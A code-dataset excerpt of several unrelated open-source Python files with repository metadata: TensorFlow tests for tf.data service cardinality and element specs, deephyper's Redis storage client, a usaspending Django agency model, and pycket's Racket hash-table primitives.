# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service metadata."""
import functools
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests.service import test_base as data_service_test_base
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.experimental.ops import distribute
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import test
def _cardinality_test_combinations():
"""Generate test combinations for data service cardinality tests.
We test only V2 combinations for the infinite and 0 cases because the `map`
transformation for compression makes the cardinality unknown in TF1.
Returns:
test combinations.
"""
def _reduce_cases_to_combinations(result, case):
name, dataset_fn, sharding_policy, expected_result = case
return result + combinations.combine(
dataset_fn=combinations.NamedObject(name, dataset_fn),
sharding_policy=sharding_policy,
expected_result=expected_result)
def _cases_to_combinations(cases):
return functools.reduce(_reduce_cases_to_combinations, cases, [])
def _infinite_dataset_with_hint_shard():
return (dataset_ops.Dataset.range(10).shard(distribute.SHARD_HINT,
distribute.SHARD_HINT).repeat())
def _empty_dataset_with_hint_shard():
return (dataset_ops.Dataset.range(0).shard(distribute.SHARD_HINT,
distribute.SHARD_HINT))
v2_only_cases = [
("NoShardingInfinite", lambda: dataset_ops.Dataset.range(10).repeat(),
data_service_ops.ShardingPolicy.OFF, dataset_ops.INFINITE),
("DynamicShardingInfinite", lambda: dataset_ops.Dataset.range(5).repeat(),
data_service_ops.ShardingPolicy.DYNAMIC, dataset_ops.INFINITE),
("DataShardingInfinite", lambda: dataset_ops.Dataset.range(10).repeat(),
data_service_ops.ShardingPolicy.DATA, dataset_ops.INFINITE),
("NoShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.OFF, 0),
("DynamicShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.DYNAMIC, 0),
("DataShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.DATA, 0),
("FileOrDataShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.FILE_OR_DATA, 0),
("HintShardingZero", _empty_dataset_with_hint_shard,
data_service_ops.ShardingPolicy.HINT, dataset_ops.UNKNOWN),
]
v1_and_v2_cases = [
("Finite", lambda: dataset_ops.Dataset.range(10),
data_service_ops.ShardingPolicy.OFF, dataset_ops.UNKNOWN),
("FileOrDataShardingUnknown",
lambda: dataset_ops.Dataset.range(10).repeat(),
data_service_ops.ShardingPolicy.FILE_OR_DATA, dataset_ops.UNKNOWN),
("HintShardingUnknown", _infinite_dataset_with_hint_shard,
data_service_ops.ShardingPolicy.HINT, dataset_ops.UNKNOWN),
]
v2_only_combinations = combinations.times(
combinations.combine(tf_api_version=2, mode=["eager", "graph"]),
_cases_to_combinations(v2_only_cases))
v1_and_v2_combinations = combinations.times(
combinations.combine(tf_api_version=[1, 2], mode=["eager", "graph"]),
_cases_to_combinations(v1_and_v2_cases))
return v2_only_combinations + v1_and_v2_combinations
class DataServiceMetadataTest(data_service_test_base.TestBase,
parameterized.TestCase):
"""Tests propagating data service metadata through tf.data service."""
@combinations.generate(_cardinality_test_combinations())
def testCardinality(self, dataset_fn, sharding_policy, expected_result):
cluster = data_service_test_base.TestCluster(num_workers=2)
dataset = dataset_fn()
dataset = self.make_distributed_dataset(
dataset, cluster=cluster, processing_mode=sharding_policy)
self.assertEqual(self.evaluate(dataset.cardinality()), expected_result)
@combinations.generate(_cardinality_test_combinations())
def testFromDatasetIdCardinality(self, dataset_fn, sharding_policy,
expected_result):
cluster = data_service_test_base.TestCluster(num_workers=2)
dataset = dataset_fn()
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset=dataset)
dataset = data_service_ops.from_dataset_id(
processing_mode=sharding_policy,
service=cluster.dispatcher.target,
dataset_id=dataset_id,
element_spec=dataset.element_spec)
self.assertEqual(self.evaluate(dataset.cardinality()), expected_result)
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdDoesntRequireElementSpec(self):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=data_service_test_base.NO_WORK_DIR,
fault_tolerant_mode=False,
data_transfer_protocol="grpc")
num_elements = 10
dataset = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(cluster.dispatcher_address(),
dataset)
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher_address(),
dataset_id=dataset_id)
self.assertDatasetProduces(dataset, list(range(num_elements)))
@combinations.generate(test_base.graph_only_combinations())
def testElementSpecGraphMode(self):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=data_service_test_base.NO_WORK_DIR,
fault_tolerant_mode=False)
num_elements = 10
dataset = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(cluster.dispatcher_address(),
dataset)
with self.assertRaisesRegex(
ValueError, "In graph mode `element_spec` must be provided manually."):
_ = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher_address(),
dataset_id=dataset_id)
@combinations.generate(test_base.eager_only_combinations())
def testElementSpecMixedMode(self):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=data_service_test_base.NO_WORK_DIR,
fault_tolerant_mode=False)
num_elements = 10
dataset = dataset_ops.Dataset.range(num_elements)
@def_function.function
def get_dataset_id():
return data_service_ops.register_dataset(cluster.dispatcher_address(),
dataset)
dataset_id = get_dataset_id()
dataset_id_val = tensor_util.constant_value(dataset_id)
with self.assertRaisesRegex(
ValueError,
f"Failed to fetch element spec for dataset id {dataset_id_val} from "
"tf.data service. If the dataset was registered in graph mode or "
"inside a tf.function, the `element_spec` must be specified as an "
"argument to `from_dataset_id`."):
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher_address(),
dataset_id=dataset_id)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(compression=[None, "AUTO"])))
def testFromDatasetIdOmitsCompression(self, compression):
cluster = data_service_test_base.TestCluster(
num_workers=1, data_transfer_protocol="grpc")
dataset = dataset_ops.Dataset.from_tensor_slices(
list("abcdefghijklmnopqrstuvwxyz"))
def to_upper(x):
return script_ops.numpy_function(
func=lambda x: x.decode("utf-8").upper(), inp=[x], Tout=dtypes.string)
dataset = dataset.map(to_upper, num_parallel_calls=dataset_ops.AUTOTUNE)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset=dataset, compression=compression)
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
dataset_id=dataset_id,
element_spec=dataset.element_spec)
self.assertDatasetProduces(dataset, list("ABCDEFGHIJKLMNOPQRSTUVWXYZ"))
# Eager-only as querying `element_spec` is only supported in the eager mode.
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(compression=[None, "AUTO"])))
def testFromDatasetIdOmitsElementSpecAndCompression(self, compression):
cluster = data_service_test_base.TestCluster(
num_workers=1, data_transfer_protocol="grpc")
dataset = dataset_ops.Dataset.from_tensor_slices(
list("ABCDEFGHIJKLMNOPQRSTUVWXYZ"))
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset=dataset, compression=compression)
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
dataset_id=dataset_id)
self.assertDatasetProduces(dataset, list("ABCDEFGHIJKLMNOPQRSTUVWXYZ"))
if __name__ == "__main__":
test.main()
|
9c704571f31ac63181ea551b911973d5e59050bf
|
e20264d49e426f91bdaf225280ca8ab156115da4
|
/deephyper/evaluator/storage/_redis_storage.py
|
c43fd4729f98cb1e416c48a09709acb3d996ee36
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
deephyper/deephyper
|
8f21610c05b6d7630633d19251db434019c50379
|
98854c61b94433d4b0668a3a914ea1e747e7f249
|
refs/heads/master
| 2023-08-19T08:21:59.141952
| 2023-07-31T15:23:41
| 2023-07-31T15:23:41
| 156,403,341
| 236
| 67
|
BSD-3-Clause
| 2023-07-31T14:59:42
| 2018-11-06T15:18:42
|
Python
|
UTF-8
|
Python
| false
| false
| 8,727
|
py
|
_redis_storage.py
|
import pickle
from typing import Any, Dict, Hashable, List, Tuple
import redis
from deephyper.evaluator.storage._storage import Storage
class RedisStorage(Storage):
"""Storage client for Redis.
The Redis server should be started with the Redis-JSON module loaded.
Args:
host (str, optional): The host of the Redis server. Defaults to "localhost".
port (int, optional): The port of the Redis server. Defaults to 6379.
db (int, optional): The database of the Redis server. Defaults to 0.
"""
def __init__(self, host="localhost", port=6379, db=0) -> None:
super().__init__()
self._host = host
self._port = port
self._db = db
self._redis = None
def _connect(self):
self._redis = redis.Redis(
host=self._host,
port=self._port,
db=self._db,
charset="utf-8",
decode_responses=True,
)
self.connected = True
self._redis.setnx("search_id_counter", 0)
def __getstate__(self):
state = {
"_host": self._host,
"_port": self._port,
"_db": self._db,
"_redis": None,
"connected": False,
}
return state
def __setstate__(self, newstate):
self.__dict__.update(newstate)
self.connect()
def create_new_search(self) -> Hashable:
"""Create a new search in the store and returns its identifier.
Returns:
Hashable: The identifier of the search.
"""
search_id_counter = self._redis.incr("search_id_counter", amount=1) - 1
search_id = f"{search_id_counter}" # converting to str
self._redis.rpush("search_id_list", search_id)
return search_id
def create_new_job(self, search_id: Hashable) -> Hashable:
"""Creates a new job in the store and returns its identifier.
Args:
search_id (Hashable): The identifier of the search in which a new job
is created.
Returns:
Hashable: The created identifier of the job.
"""
partial_id = (
self._redis.incr(f"search:{search_id}.job_id_counter", amount=1) - 1
)
partial_id = f"{partial_id}" # converting to str
job_id = f"{search_id}.{partial_id}"
self._redis.rpush(f"search:{search_id}.job_id_list", job_id)
self._redis.json().set(
f"job:{job_id}", ".", {"in": None, "metadata": {}, "out": None}
)
return job_id
def store_job(self, job_id: Hashable, key: Hashable, value: Any) -> None:
"""Stores the value corresponding to key for job_id.
Args:
job_id (Hashable): The identifier of the job.
key (Hashable): A key to use to store the value.
value (Any): The value to store.
"""
self._redis.json().set(f"job:{job_id}", f".{key}", value)
def store_job_in(
self, job_id: Hashable, args: Tuple = None, kwargs: Dict = None
) -> None:
"""Stores the input arguments of the executed job.
Args:
job_id (Hashable): The identifier of the job.
args (Optional[Tuple], optional): The positional arguments. Defaults to None.
kwargs (Optional[Dict], optional): The keyword arguments. Defaults to None.
"""
self.store_job(job_id, key="in", value={"args": args, "kwargs": kwargs})
def store_job_out(self, job_id: Hashable, value: Any) -> None:
"""Stores the output value of the executed job.
Args:
job_id (Hashable): The identifier of the job.
value (Any): The value to store.
"""
self.store_job(job_id, key="out", value=value)
def store_job_metadata(self, job_id: Hashable, key: Hashable, value: Any) -> None:
"""Stores other metadata related to the execution of the job.
Args:
job_id (Hashable): The identifier of the job.
key (Hashable): A key to use to store the metadata of the given job.
value (Any): The value to store.
"""
self._redis.json().set(f"job:{job_id}", f".metadata.{key}", value)
def load_all_search_ids(self) -> List[Hashable]:
"""Loads the identifiers of all recorded searches.
Returns:
List[Hashable]: A list of identifiers of all the recorded searches.
"""
search_ids = self._redis.lrange("search_id_list", 0, -1)
return search_ids
def load_all_job_ids(self, search_id: Hashable) -> List[Hashable]:
"""Loads the identifiers of all recorded jobs in the search.
Args:
search_id (Hashable): The identifier of the search.
Returns:
List[Hashable]: A list of identifiers of all the jobs.
"""
job_ids = self._redis.lrange(f"search:{search_id}.job_id_list", 0, -1)
return job_ids
def load_search(self, search_id: Hashable) -> dict:
"""Loads the data of a search.
Args:
search_id (Hashable): The identifier of the search.
Returns:
dict: The corresponding data of the search.
"""
job_ids = self.load_all_job_ids(search_id)
with self._redis.pipeline() as pipe:
for job_id in job_ids:
pipe.json().get(f"job:{job_id}", ".")
data = pipe.execute()
for i, job_id in enumerate(job_ids):
data[i]["job_id"] = job_id
return data
def load_job(self, job_id: Hashable) -> dict:
"""Loads the data of a job.
Args:
job_id (Hashable): The identifier of the job.
Returns:
dict: The corresponding data of the job.
"""
data = self._redis.json().get(f"job:{job_id}", ".")
return data
def store_search_value(
self, search_id: Hashable, key: Hashable, value: Any
) -> None:
"""Stores the value corresponding to key for search_id.
Args:
search_id (Hashable): The identifier of the job.
key (Hashable): A key to use to store the value.
value (Any): The value to store.
"""
key = f"{search_id}.{key}"
value = pickle.dumps(value)
self._redis.set(key, value)
def load_search_value(self, search_id: Hashable, key: Hashable) -> Any:
"""Loads the value corresponding to key for search_id.
Args:
search_id (Hashable): The identifier of the job.
key (Hashable): A key to use to access the value.
"""
key = f"{search_id}.{key}"
value = self._redis.get(key)
value = pickle.loads(value)
return value
def load_metadata_from_all_jobs(
self, search_id: Hashable, key: Hashable
) -> List[Any]:
"""Loads a given metadata value from all jobs.
Args:
search_id (Hashable): The identifier of the search.
key (Hashable): The identifier of the value.
Returns:
List[Any]: A list of all the retrieved metadata values.
"""
search_id
jobs_ids = self.load_all_job_ids(search_id)
values = []
for job_id in jobs_ids:
try:
value = self._redis.json().get(f"job:{job_id}", f".metadata.{key}")
except redis.exceptions.ResponseError:
value = None
if value is not None:
values.append(value)
return values
def load_out_from_all_jobs(self, search_id: Hashable) -> List[Any]:
"""Loads the output value from all jobs.
Args:
search_id (Hashable): The identifier of the search.
Returns:
List[Any]: A list of all the retrieved output values.
"""
jobs_ids = self.load_all_job_ids(search_id)
values = []
for job_id in jobs_ids:
try:
value = self._redis.json().get(f"job:{job_id}", ".out")
except redis.exceptions.ResponseError:
value = None
if value is not None:
values.append(value)
return values
def load_jobs(self, job_ids: List[Hashable]) -> dict:
"""Load all data from a given list of jobs' identifiers.
Args:
job_ids (list): The list of job identifiers.
Returns:
dict: A dictionnary of the retrieved values where the keys are the identifier of jobs.
"""
redis_job_ids = map(lambda jid: f"job:{jid}", job_ids)
data = self._redis.json().mget(redis_job_ids, ".")
data = {k: v for k, v in zip(job_ids, data)}
return data
|
5927bc3817f751fb1ef56c58f08ab0c3682e4b24
|
c530897cb72b6943c7226b25824444cad5f3503b
|
/usaspending_api/references/models/subtier_agency.py
|
94d0c66ee829ea65da0316d7918fa10c3ec648e9
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/usaspending-api
|
fc63a22d32ea0207b7273d3e1ef26ba9dbabc42a
|
38f920438697930ae3ac57bbcaae9034877d8fb7
|
refs/heads/master
| 2023-09-01T22:00:36.633612
| 2023-08-29T18:39:18
| 2023-08-29T18:39:18
| 65,394,827
| 276
| 118
|
CC0-1.0
| 2023-09-14T20:33:15
| 2016-08-10T15:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 456
|
py
|
subtier_agency.py
|
from django.db import models
class SubtierAgency(models.Model):
subtier_agency_id = models.AutoField(primary_key=True)
create_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
subtier_code = models.TextField(db_index=True, unique=True)
abbreviation = models.TextField(blank=True, null=True)
name = models.TextField(db_index=True)
class Meta:
db_table = "subtier_agency"
|
02f3676938748223b18badb86845895c21ee3796
|
0ac2d343bad7e25df1a2f2be951854d86b3ad173
|
/pycket/prims/hash.py
|
9d70d4520e9903573914cf7ce94d621b44162102
|
[
"MIT"
] |
permissive
|
pycket/pycket
|
8c28888af4967b0f85c54f83f4ccd536fc8ac907
|
05ebd9885efa3a0ae54e77c1a1f07ea441b445c6
|
refs/heads/master
| 2021-12-01T16:26:09.149864
| 2021-08-08T17:01:12
| 2021-08-08T17:01:12
| 14,119,907
| 158
| 14
|
MIT
| 2021-08-08T17:01:12
| 2013-11-04T18:39:34
|
Python
|
UTF-8
|
Python
| false
| false
| 15,974
|
py
|
hash.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from pycket import impersonators as imp
from pycket import values, values_string
from pycket.hash.base import W_HashTable, W_ImmutableHashTable, w_missing
from pycket.hash.simple import (
W_EqvMutableHashTable, W_EqMutableHashTable,
W_EqvImmutableHashTable, W_EqImmutableHashTable,
make_simple_mutable_table, make_simple_mutable_table_assocs,
make_simple_immutable_table, make_simple_immutable_table_assocs)
from pycket.hash.equal import W_EqualHashTable
from pycket.impersonators.baseline import W_ImpHashTable, W_ChpHashTable
from pycket.cont import continuation, loop_label
from pycket.error import SchemeException
from pycket.prims.expose import default, expose, procedure, define_nyi
from rpython.rlib import jit, objectmodel
_KEY = 0
_VALUE = 1
_KEY_AND_VALUE = 2
_PAIR = 3
PREFIXES = ["unsafe-mutable", "unsafe-immutable"]
def prefix_hash_names(base):
result = [base]
for pre in PREFIXES:
result.append("%s-%s" % (pre, base))
return result
@expose(prefix_hash_names("hash-iterate-first"), [W_HashTable])
def hash_iterate_first(ht):
if ht.length() == 0:
return values.w_false
return values.W_Fixnum.ZERO
@expose(prefix_hash_names("hash-iterate-next"), [W_HashTable, values.W_Fixnum])
def hash_iterate_next(ht, pos):
return ht.hash_iterate_next(pos)
@objectmodel.specialize.arg(4)
def hash_iter_ref(ht, n, env, cont, returns):
from pycket.interpreter import return_value, return_multi_vals
try:
w_key, w_val = ht.get_item(n)
if returns == _KEY:
return return_value(w_key, env, cont)
if returns == _VALUE:
return return_value(w_val, env, cont)
if returns == _KEY_AND_VALUE:
vals = values.Values._make2(w_key, w_val)
return return_multi_vals(vals, env, cont)
if returns == _PAIR:
vals = values.W_Cons.make(w_key, w_val)
return return_value(vals, env, cont)
assert False, "unknown return code"
except KeyError:
raise SchemeException("hash-iterate-key: invalid position")
except IndexError:
raise SchemeException("hash-iterate-key: invalid position")
@expose(prefix_hash_names("hash-iterate-key"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_key(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_KEY)
@expose(prefix_hash_names("hash-iterate-value"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_value(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_VALUE)
@expose(prefix_hash_names("hash-iterate-key+value"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_key_value(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_KEY_AND_VALUE)
@expose(prefix_hash_names("hash-iterate-pair"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_pair(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_PAIR)
@expose("hash-for-each", [W_HashTable, procedure, default(values.W_Object, values.w_false)], simple=False)
def hash_for_each(ht, f, try_order, env, cont):
# FIXME: implmeent try-order? -- see hash-map
return hash_for_each_loop(ht, f, 0, env, cont)
@loop_label
def hash_for_each_loop(ht, f, index, env, cont):
from pycket.interpreter import return_value
try:
w_key, w_value = ht.get_item(index)
except KeyError:
return hash_for_each_loop(ht, f, index + 1, env, cont)
except IndexError:
return return_value(values.w_void, env, cont)
return f.call([w_key, w_value], env,
hash_for_each_cont(ht, f, index, env, cont))
@continuation
def hash_for_each_cont(ht, f, index, env, cont, _vals):
return hash_for_each_loop(ht, f, index + 1, env, cont)
@expose("hash-map", [W_HashTable, procedure, default(values.W_Object, values.w_false)], simple=False)
def hash_map(h, f, try_order, env, cont):
# FIXME : If try-order? is true, then the order of keys and values
# passed to proc is normalized under certain circumstances, such
# as when the keys are all symbols and hash is not an
# impersonator.
from pycket.interpreter import return_value
acc = values.w_null
return hash_map_loop(f, h, 0, acc, env, cont)
# f.enable_jitting()
# return return_value(w_missing, env,
# hash_map_cont(f, h, 0, acc, env, cont))
@loop_label
def hash_map_loop(f, ht, index, w_acc, env, cont):
from pycket.interpreter import return_value
try:
w_key, w_value = ht.get_item(index)
except KeyError:
return hash_map_loop(f, ht, index + 1, w_acc, env, cont)
except IndexError:
return return_value(w_acc, env, cont)
after = hash_map_cont(f, ht, index, w_acc, env, cont)
return f.call([w_key, w_value], env, after)
@continuation
def hash_map_cont(f, ht, index, w_acc, env, cont, _vals):
from pycket.interpreter import check_one_val
w_val = check_one_val(_vals)
w_acc = values.W_Cons.make(w_val, w_acc)
return hash_map_loop(f, ht, index + 1, w_acc, env, cont)
@jit.elidable
def from_assocs(assocs, fname):
if not assocs.is_proper_list():
raise SchemeException("%s: expected proper list" % fname)
keys = []
vals = []
while isinstance(assocs, values.W_Cons):
val, assocs = assocs.car(), assocs.cdr()
if not isinstance(val, values.W_Cons):
raise SchemeException("%s: expected list of pairs" % fname)
keys.append(val.car())
vals.append(val.cdr())
return keys[:], vals[:]
@expose("make-weak-hasheq", [default(values.W_List, values.w_null)])
def make_weak_hasheq(assocs):
# FIXME: not actually weak
return make_simple_mutable_table_assocs(W_EqMutableHashTable, assocs, "make-weak-hasheq")
@expose("make-weak-hasheqv", [default(values.W_List, values.w_null)])
def make_weak_hasheqv(assocs):
# FIXME: not actually weak
return make_simple_mutable_table_assocs(W_EqvMutableHashTable, assocs, "make-weak-hasheqv")
@expose(["make-weak-hash", "make-late-weak-hasheq"], [default(values.W_List, None)])
def make_weak_hash(assocs):
if assocs is None:
return W_EqualHashTable([], [], immutable=False)
return W_EqualHashTable(*from_assocs(assocs, "make-weak-hash"), immutable=False)
@expose("make-immutable-hash", [default(values.W_List, values.w_null)])
def make_immutable_hash(assocs):
keys, vals = from_assocs(assocs, "make-immutable-hash")
return W_EqualHashTable(keys, vals, immutable=True)
@expose("make-immutable-hasheq", [default(values.W_List, values.w_null)])
def make_immutable_hasheq(assocs):
return make_simple_immutable_table_assocs(W_EqImmutableHashTable, assocs, "make-immutable-hasheq")
@expose("make-immutable-hasheqv", [default(values.W_List, values.w_null)])
def make_immutable_hasheqv(assocs):
return make_simple_immutable_table_assocs(W_EqvImmutableHashTable, assocs, "make-immutable-hasheq")
@expose("hash")
def hash(args):
if len(args) % 2 != 0:
raise SchemeException("hash: key does not have a corresponding value")
keys = [args[i] for i in range(0, len(args), 2)]
vals = [args[i] for i in range(1, len(args), 2)]
return W_EqualHashTable(keys, vals, immutable=True)
@expose("hasheq")
def hasheq(args):
if len(args) % 2 != 0:
raise SchemeException("hasheq: key does not have a corresponding value")
keys = [args[i] for i in range(0, len(args), 2)]
vals = [args[i] for i in range(1, len(args), 2)]
return make_simple_immutable_table(W_EqImmutableHashTable, keys, vals)
@expose("hasheqv")
def hasheqv(args):
if len(args) % 2 != 0:
raise SchemeException("hasheqv: key does not have a corresponding value")
keys = [args[i] for i in range(0, len(args), 2)]
vals = [args[i] for i in range(1, len(args), 2)]
return make_simple_immutable_table(W_EqvImmutableHashTable, keys, vals)
@expose("make-hash", [default(values.W_List, values.w_null)])
def make_hash(pairs):
return W_EqualHashTable(*from_assocs(pairs, "make-hash"))
@expose("make-hasheq", [default(values.W_List, values.w_null)])
def make_hasheq(pairs):
return make_simple_mutable_table_assocs(W_EqMutableHashTable, pairs, "make-hasheq")
@expose("make-hasheqv", [default(values.W_List, values.w_null)])
def make_hasheqv(pairs):
return make_simple_mutable_table_assocs(W_EqvMutableHashTable, pairs, "make-hasheqv")
@expose("hash-set!", [W_HashTable, values.W_Object, values.W_Object], simple=False)
def hash_set_bang(ht, k, v, env, cont):
if ht.immutable():
raise SchemeException("hash-set!: given immutable table")
return ht.hash_set(k, v, env, cont)
@continuation
def hash_set_cont(key, val, env, cont, _vals):
from pycket.interpreter import check_one_val
table = check_one_val(_vals)
return table.hash_set(key, val, env, return_table_cont(table, env, cont))
@continuation
def return_table_cont(table, env, cont, _vals):
from pycket.interpreter import return_value
return return_value(table, env, cont)
@expose("hash-set", [W_HashTable, values.W_Object, values.W_Object], simple=False)
def hash_set(table, key, val, env, cont):
from pycket.interpreter import return_value
if not table.immutable():
raise SchemeException("hash-set: not given an immutable table")
# Fast path
if isinstance(table, W_ImmutableHashTable):
new_table = table.assoc(key, val)
return return_value(new_table, env, cont)
return hash_copy(table, env,
hash_set_cont(key, val, env, cont))
@continuation
def hash_ref_cont(default, k, env, cont, _vals):
from pycket.interpreter import return_value, check_one_val
val = check_one_val(_vals)
if val is not w_missing:
return return_value(val, env, cont)
if default is None:
raise SchemeException("key %s not found"%k.tostring())
if default.iscallable():
return default.call([], env, cont)
return return_value(default, env, cont)
@expose("hash-ref", [W_HashTable, values.W_Object, default(values.W_Object, None)], simple=False)
def hash_ref(ht, k, default, env, cont):
return ht.hash_ref(k, env, hash_ref_cont(default, k, env, cont))
@expose("hash-remove!", [W_HashTable, values.W_Object], simple=False)
def hash_remove_bang(ht, k, env, cont):
if ht.immutable():
raise SchemeException("hash-remove!: expected mutable hash table")
return ht.hash_remove_inplace(k, env, cont)
@expose("hash-remove", [W_HashTable, values.W_Object], simple=False)
def hash_remove(ht, k, env, cont):
if not ht.immutable():
raise SchemeException("hash-remove: expected immutable hash table")
return ht.hash_remove(k, env, cont)
@continuation
def hash_clear_cont(ht, env, cont, _vals):
return hash_clear_loop(ht, env, cont)
def hash_clear_loop(ht, env, cont):
from pycket.interpreter import return_value
if ht.length() == 0:
return return_value(values.w_void, env, cont)
w_k, w_v = ht.get_item(0)
return ht.hash_remove_inplace(w_k, env, hash_clear_cont(ht, env, cont))
@expose("hash-clear!", [W_HashTable], simple=False)
def hash_clear_bang(ht, env, cont):
from pycket.interpreter import return_value
if ht.is_impersonator():
ht.hash_clear_proc(env, cont)
return hash_clear_loop(ht, env, cont)
else:
ht.hash_empty()
return return_value(values.w_void, env, cont)
define_nyi("hash-clear", [W_HashTable])
@expose("hash-count", [W_HashTable])
def hash_count(hash):
return values.W_Fixnum(hash.length())
@continuation
def hash_keys_subset_huh_cont(keys_vals, hash_2, idx, env, cont, _vals):
from pycket.interpreter import return_value, check_one_val
val = check_one_val(_vals)
if val is values.w_false:
return return_value(values.w_false, env, cont)
else:
return hash_keys_subset_huh_loop(keys_vals, hash_2, idx + 1, env, cont)
@loop_label
def hash_keys_subset_huh_loop(keys_vals, hash_2, idx, env, cont):
from pycket.interpreter import return_value
if idx >= len(keys_vals):
return return_value(values.w_true, env, cont)
else:
return hash_ref([hash_2, keys_vals[idx][0], values.w_false], env,
hash_keys_subset_huh_cont(keys_vals, hash_2, idx, env, cont))
@jit.elidable
def uses_same_eq_comparison(hash_1, hash_2):
h_1 = hash_1
h_2 = hash_2
if hash_1.is_impersonator() or hash_1.is_chaperone():
h_1 = hash_1.get_proxied()
if hash_2.is_impersonator() or hash_2.is_chaperone():
h_2 = hash_2.get_proxied()
if isinstance(h_1, W_EqualHashTable):
return isinstance(h_2, W_EqualHashTable)
elif isinstance(h_1, W_EqMutableHashTable) or isinstance(h_1, W_EqImmutableHashTable):
return isinstance(h_2, W_EqMutableHashTable) or isinstance(h_2, W_EqImmutableHashTable)
elif isinstance(h_1, W_EqvMutableHashTable) or isinstance(h_1, W_EqvImmutableHashTable):
return isinstance(h_2, W_EqvMutableHashTable) or isinstance(h_2, W_EqvImmutableHashTable)
else:
return False
@expose("hash-keys-subset?", [W_HashTable, W_HashTable], simple=False)
def hash_keys_subset_huh(hash_1, hash_2, env, cont):
if not uses_same_eq_comparison(hash_1, hash_2):
raise SchemeException("hash-keys-subset?: given hash tables do not use the same key comparison -- first table : %s - second table: %s" % (hash_1.tostring(), hash_2.tostring()))
return hash_keys_subset_huh_loop(hash_1.hash_items(), hash_2, 0, env, cont)
@continuation
def hash_copy_ref_cont(keys, idx, src, new, env, cont, _vals):
from pycket.interpreter import check_one_val
val = check_one_val(_vals)
return new.hash_set(keys[idx][0], val, env,
hash_copy_set_cont(keys, idx, src, new, env, cont))
@continuation
def hash_copy_set_cont(keys, idx, src, new, env, cont, _vals):
return hash_copy_loop(keys, idx + 1, src, new, env, cont)
@loop_label
def hash_copy_loop(keys, idx, src, new, env, cont):
from pycket.interpreter import return_value
if idx >= len(keys):
return return_value(new, env, cont)
return src.hash_ref(keys[idx][0], env,
hash_copy_ref_cont(keys, idx, src, new, env, cont))
def hash_copy(src, env, cont):
from pycket.interpreter import return_value
if isinstance(src, W_ImmutableHashTable):
new = src.make_copy()
return return_value(new, env, cont)
new = src.make_empty()
if src.length() == 0:
return return_value(new, env, cont)
return hash_copy_loop(src.hash_items(), 0, src, new, env, cont)
expose("hash-copy", [W_HashTable], simple=False)(hash_copy)
# FIXME: not implemented
@expose("equal-hash-code", [values.W_Object])
def equal_hash_code(v):
# only for improper path cache entries
if isinstance(v, values.W_Cons):
if v.is_proper_list():
return values.W_Fixnum.ZERO
nm = v.car()
p = v.cdr()
if isinstance(nm, values_string.W_String) and \
isinstance(p, values.W_Path) and \
isinstance(p.path, str):
return values.W_Fixnum(objectmodel.compute_hash((nm.tostring(), p.path)))
return values.W_Fixnum.ZERO
@expose("equal-secondary-hash-code", [values.W_Object])
def equal_secondary_hash_code(v):
return values.W_Fixnum.ZERO
@expose("eq-hash-code", [values.W_Object])
def eq_hash_code(v):
t = type(v)
if t is values.W_Fixnum:
return v
if t is values.W_Flonum:
hash = objectmodel.compute_hash(v.value)
elif t is values.W_Character:
hash = objectmodel.compute_hash(v.value)
else:
hash = objectmodel.compute_hash(v)
return values.W_Fixnum(hash)
@expose("eqv-hash-code", [values.W_Object])
def eqv_hash_code(v):
hash = v.hash_eqv()
return values.W_Fixnum(hash)
|
e8cbb4fd8ab0b39dc4c0e42a9c0d75c36f767f67
|
88ae8695987ada722184307301e221e1ba3cc2fa
|
